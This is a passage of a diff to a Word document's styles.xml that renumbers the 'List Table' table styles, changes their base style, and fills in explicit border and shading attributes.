+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -18382,9 +18564,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="85">
+  <w:style w:type="table" w:styleId="788">
     <w:name w:val="List Table 3 - Accent 4"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -18610,9 +18792,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="86">
+  <w:style w:type="table" w:styleId="789">
     <w:name w:val="List Table 3 - Accent 5"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -18838,9 +19020,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="87">
+  <w:style w:type="table" w:styleId="790">
     <w:name w:val="List Table 3 - Accent 6"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -19066,9 +19248,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="88">
+  <w:style w:type="table" w:styleId="791">
     <w:name w:val="List Table 4"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -19291,9 +19473,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="89">
+  <w:style w:type="table" w:styleId="792">
     <w:name w:val="List Table 4 - Accent 1"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -19516,9 +19698,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="90">
+  <w:style w:type="table" w:styleId="793">
     <w:name w:val="List Table 4 - Accent 2"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -19741,9 +19923,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="91">
+  <w:style w:type="table" w:styleId="794">
     <w:name w:val="List Table 4 - Accent 3"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -19966,9 +20148,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="92">
+  <w:style w:type="table" w:styleId="795">
     <w:name w:val="List Table 4 - Accent 4"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -20191,9 +20373,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="93">
+  <w:style w:type="table" w:styleId="796">
     <w:name w:val="List Table 4 - Accent 5"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -20416,9 +20598,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="94">
+  <w:style w:type="table" w:styleId="797">
     <w:name w:val="List Table 4 - Accent 6"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -20641,9 +20823,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="95">
+  <w:style w:type="table" w:styleId="798">
     <w:name w:val="List Table 5 Dark"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -20883,9 +21065,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="96">
+  <w:style w:type="table" w:styleId="799">
     <w:name w:val="List Table 5 Dark - Accent 1"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -21125,9 +21307,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="97">
+  <w:style w:type="table" w:styleId="800">
     <w:name w:val="List Table 5 Dark - Accent 2"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -21367,9 +21549,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="98">
+  <w:style w:type="table" w:styleId="801">
     <w:name w:val="List Table 5 Dark - Accent 3"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -21609,9 +21791,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="99">
+  <w:style w:type="table" w:styleId="802">
     <w:name w:val="List Table 5 Dark - Accent 4"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -21851,9 +22033,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="100">
+  <w:style w:type="table" w:styleId="803">
     <w:name w:val="List Table 5 Dark - Accent 5"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -22093,9 +22275,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="101">
+  <w:style w:type="table" w:styleId="804">
     <w:name w:val="List Table 5 Dark - Accent 6"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -22335,9 +22517,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="102">
+  <w:style w:type="table" w:styleId="805">
     <w:name w:val="List Table 6 Colorful"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -22558,9 +22740,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="103">
+  <w:style w:type="table" w:styleId="806">
     <w:name w:val="List Table 6 Colorful - Accent 1"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -22781,9 +22963,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="104">
+  <w:style w:type="table" w:styleId="807">
     <w:name w:val="List Table 6 Colorful - Accent 2"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -23004,9 +23186,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="105">
+  <w:style w:type="table" w:styleId="808">
     <w:name w:val="List Table 6 Colorful - Accent 3"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -23227,9 +23409,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="106">
+  <w:style w:type="table" w:styleId="809">
     <w:name w:val="List Table 6 Colorful - Accent 4"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -23450,9 +23632,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="107">
+  <w:style w:type="table" w:styleId="810">
     <w:name w:val="List Table 6 Colorful - Accent 5"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -23673,9 +23855,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="108">
+  <w:style w:type="table" w:styleId="811">
     <w:name w:val="List Table 6 Colorful - Accent 6"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -23896,9 +24078,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="109">
+  <w:style w:type="table" w:styleId="812">
     <w:name w:val="List Table 7 Colorful"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -23997,11 +24179,11 @@
         <w:tblBorders/>
       </w:tblPr>
       <w:tcPr>
-        <w:shd w:color="ffffff"/>
+        <w:shd w:val="clear" w:color="ffffff"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
-          <w:left w:val="none"/>
-          <w:bottom w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:right w:val="single" w:color="000000" w:themeColor="text1" w:themeTint="80" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
@@ -24024,10 +24206,10 @@
       <w:tcPr>
         <w:shd w:val="clear" w:color="ffffff" w:themeColor="light1" w:fill="ffffff" w:themeFill="light1"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
-          <w:left w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:themeTint="80" w:sz="4" w:space="0"/>
-          <w:right w:val="none"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -24047,12 +24229,12 @@
         <w:tblBorders/>
       </w:tblPr>
       <w:tcPr>
-        <w:shd w:color="ffffff"/>
+        <w:shd w:val="clear" w:color="ffffff"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:left w:val="single" w:color="000000" w:themeColor="text1" w:themeTint="80" w:sz="4" w:space="0"/>
-          <w:bottom w:val="none"/>
-          <w:right w:val="none"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -24075,9 +24257,9 @@
         <w:shd w:val="clear" w:color="ffffff" w:themeColor="light1" w:fill="ffffff" w:themeFill="light1"/>
         <w:tcBorders>
           <w:top w:val="single" w:color="000000" w:themeColor="text1" w:themeTint="80" w:sz="4" w:space="0"/>
-          <w:left w:val="none"/>
-          <w:bottom w:val="none"/>
-          <w:right w:val="none"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -24152,9 +24334,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="110">
+  <w:style w:type="table" w:styleId="813">
     <w:name w:val="List Table 7 Colorful - Accent 1"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -24253,11 +24435,11 @@
         <w:tblBorders/>
       </w:tblPr>
       <w:tcPr>
-        <w:shd w:color="ffffff"/>
+        <w:shd w:val="clear" w:color="ffffff"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
-          <w:left w:val="none"/>
-          <w:bottom w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:right w:val="single" w:color="000000" w:themeColor="accent1" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
@@ -24280,10 +24462,10 @@
       <w:tcPr>
         <w:shd w:val="clear" w:color="ffffff" w:themeColor="light1" w:fill="ffffff" w:themeFill="light1"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
-          <w:left w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:bottom w:val="single" w:color="000000" w:themeColor="accent1" w:sz="4" w:space="0"/>
-          <w:right w:val="none"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -24303,12 +24485,12 @@
         <w:tblBorders/>
       </w:tblPr>
       <w:tcPr>
-        <w:shd w:color="ffffff"/>
+        <w:shd w:val="clear" w:color="ffffff"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:left w:val="single" w:color="000000" w:themeColor="accent1" w:sz="4" w:space="0"/>
-          <w:bottom w:val="none"/>
-          <w:right w:val="none"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -24331,9 +24513,9 @@
         <w:shd w:val="clear" w:color="ffffff" w:themeColor="light1" w:fill="ffffff" w:themeFill="light1"/>
         <w:tcBorders>
           <w:top w:val="single" w:color="000000" w:themeColor="accent1" w:sz="4" w:space="0"/>
-          <w:left w:val="none"/>
-          <w:bottom w:val="none"/>
-          <w:right w:val="none"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -24408,9 +24590,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="111">
+  <w:style w:type="table" w:styleId="814">
     <w:name w:val="List Table 7 Colorful - Accent 2"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -24509,11 +24691,11 @@
         <w:tblBorders/>
       </w:tblPr>
       <w:tcPr>
-        <w:shd w:color="ffffff"/>
+        <w:shd w:val="clear" w:color="ffffff"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
-          <w:left w:val="none"/>
-          <w:bottom w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:right w:val="single" w:color="000000" w:themeColor="accent2" w:themeTint="97" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
@@ -24536,10 +24718,10 @@
       <w:tcPr>
         <w:shd w:val="clear" w:color="ffffff" w:themeColor="light1" w:fill="ffffff" w:themeFill="light1"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
-          <w:left w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:bottom w:val="single" w:color="000000" w:themeColor="accent2" w:themeTint="97" w:sz="4" w:space="0"/>
-          <w:right w:val="none"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -24559,12 +24741,12 @@
         <w:tblBorders/>
       </w:tblPr>
       <w:tcPr>
-        <w:shd w:color="ffffff"/>
+        <w:shd w:val="clear" w:color="ffffff"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:left w:val="single" w:color="000000" w:themeColor="accent2" w:themeTint="97" w:sz="4" w:space="0"/>
-          <w:bottom w:val="none"/>
-          <w:right w:val="none"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -24587,9 +24769,9 @@
         <w:shd w:val="clear" w:color="ffffff" w:themeColor="light1" w:fill="ffffff" w:themeFill="light1"/>
         <w:tcBorders>
           <w:top w:val="single" w:color="000000" w:themeColor="accent2" w:themeTint="97" w:sz="4" w:space="0"/>
-          <w:left w:val="none"/>
-          <w:bottom w:val="none"/>
-          <w:right w:val="none"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -24664,9 +24846,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="112">
+  <w:style w:type="table" w:styleId="815">
     <w:name w:val="List Table 7 Colorful - Accent 3"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -24765,11 +24947,11 @@
         <w:tblBorders/>
       </w:tblPr>
       <w:tcPr>
-        <w:shd w:color="ffffff"/>
+        <w:shd w:val="clear" w:color="ffffff"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
-          <w:left w:val="none"/>
-          <w:bottom w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:right w:val="single" w:color="000000" w:themeColor="accent3" w:themeTint="98" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
@@ -24792,10 +24974,10 @@
       <w:tcPr>
         <w:shd w:val="clear" w:color="ffffff" w:themeColor="light1" w:fill="ffffff" w:themeFill="light1"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
-          <w:left w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:bottom w:val="single" w:color="000000" w:themeColor="accent3" w:themeTint="98" w:sz="4" w:space="0"/>
-          <w:right w:val="none"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -24815,12 +24997,12 @@
         <w:tblBorders/>
       </w:tblPr>
       <w:tcPr>
-        <w:shd w:color="ffffff"/>
+        <w:shd w:val="clear" w:color="ffffff"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:left w:val="single" w:color="000000" w:themeColor="accent3" w:themeTint="98" w:sz="4" w:space="0"/>
-          <w:bottom w:val="none"/>
-          <w:right w:val="none"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -24843,9 +25025,9 @@
         <w:shd w:val="clear" w:color="ffffff" w:themeColor="light1" w:fill="ffffff" w:themeFill="light1"/>
         <w:tcBorders>
           <w:top w:val="single" w:color="000000" w:themeColor="accent3" w:themeTint="98" w:sz="4" w:space="0"/>
-          <w:left w:val="none"/>
-          <w:bottom w:val="none"/>
-          <w:right w:val="none"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -24920,9 +25102,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="113">
+  <w:style w:type="table" w:styleId="816">
     <w:name w:val="List Table 7 Colorful - Accent 4"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -25021,11 +25203,11 @@
         <w:tblBorders/>
       </w:tblPr>
       <w:tcPr>
-        <w:shd w:color="ffffff"/>
+        <w:shd w:val="clear" w:color="ffffff"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
-          <w:left w:val="none"/>
-          <w:bottom w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:right w:val="single" w:color="000000" w:themeColor="accent4" w:themeTint="9A" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
@@ -25048,10 +25230,10 @@
       <w:tcPr>
         <w:shd w:val="clear" w:color="ffffff" w:themeColor="light1" w:fill="ffffff" w:themeFill="light1"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
-          <w:left w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:bottom w:val="single" w:color="000000" w:themeColor="accent4" w:themeTint="9A" w:sz="4" w:space="0"/>
-          <w:right w:val="none"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -25071,12 +25253,12 @@
         <w:tblBorders/>
       </w:tblPr>
       <w:tcPr>
-        <w:shd w:color="ffffff"/>
+        <w:shd w:val="clear" w:color="ffffff"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:left w:val="single" w:color="000000" w:themeColor="accent4" w:themeTint="9A" w:sz="4" w:space="0"/>
-          <w:bottom w:val="none"/>
-          <w:right w:val="none"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -25099,9 +25281,9 @@
         <w:shd w:val="clear" w:color="ffffff" w:themeColor="light1" w:fill="ffffff" w:themeFill="light1"/>
         <w:tcBorders>
           <w:top w:val="single" w:color="000000" w:themeColor="accent4" w:themeTint="9A" w:sz="4" w:space="0"/>
-          <w:left w:val="none"/>
-          <w:bottom w:val="none"/>
-          <w:right w:val="none"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -25176,9 +25358,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="114">
+  <w:style w:type="table" w:styleId="817">
     <w:name w:val="List Table 7 Colorful - Accent 5"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -25277,11 +25459,11 @@
         <w:tblBorders/>
       </w:tblPr>
       <w:tcPr>
-        <w:shd w:color="ffffff"/>
+        <w:shd w:val="clear" w:color="ffffff"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
-          <w:left w:val="none"/>
-          <w:bottom w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:right w:val="single" w:color="000000" w:themeColor="accent5" w:themeTint="9A" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
@@ -25304,10 +25486,10 @@
       <w:tcPr>
         <w:shd w:val="clear" w:color="ffffff" w:themeColor="light1" w:fill="ffffff" w:themeFill="light1"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
-          <w:left w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:bottom w:val="single" w:color="000000" w:themeColor="accent5" w:themeTint="9A" w:sz="4" w:space="0"/>
-          <w:right w:val="none"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -25327,12 +25509,12 @@
         <w:tblBorders/>
       </w:tblPr>
       <w:tcPr>
-        <w:shd w:color="ffffff"/>
+        <w:shd w:val="clear" w:color="ffffff"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:left w:val="single" w:color="000000" w:themeColor="accent5" w:themeTint="9A" w:sz="4" w:space="0"/>
-          <w:bottom w:val="none"/>
-          <w:right w:val="none"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -25355,9 +25537,9 @@
         <w:shd w:val="clear" w:color="ffffff" w:themeColor="light1" w:fill="ffffff" w:themeFill="light1"/>
         <w:tcBorders>
           <w:top w:val="single" w:color="000000" w:themeColor="accent5" w:themeTint="9A" w:sz="4" w:space="0"/>
-          <w:left w:val="none"/>
-          <w:bottom w:val="none"/>
-          <w:right w:val="none"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -25432,9 +25614,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="115">
+  <w:style w:type="table" w:styleId="818">
     <w:name w:val="List Table 7 Colorful - Accent 6"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -25533,11 +25715,11 @@
         <w:tblBorders/>
       </w:tblPr>
       <w:tcPr>
-        <w:shd w:color="ffffff"/>
+        <w:shd w:val="clear" w:color="ffffff"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
-          <w:left w:val="none"/>
-          <w:bottom w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:right w:val="single" w:color="000000" w:themeColor="accent6" w:themeTint="98" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
@@ -25560,10 +25742,10 @@
       <w:tcPr>
         <w:shd w:val="clear" w:color="ffffff" w:themeColor="light1" w:fill="ffffff" w:themeFill="light1"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
-          <w:left w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:bottom w:val="single" w:color="000000" w:themeColor="accent6" w:themeTint="98" w:sz="4" w:space="0"/>
-          <w:right w:val="none"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -25583,12 +25765,12 @@
         <w:tblBorders/>
       </w:tblPr>
       <w:tcPr>
-        <w:shd w:color="ffffff"/>
+        <w:shd w:val="clear" w:color="ffffff"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:left w:val="single" w:color="000000" w:themeColor="accent6" w:themeTint="98" w:sz="4" w:space="0"/>
-          <w:bottom w:val="none"/>
-          <w:right w:val="none"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -25611,9 +25793,9 @@
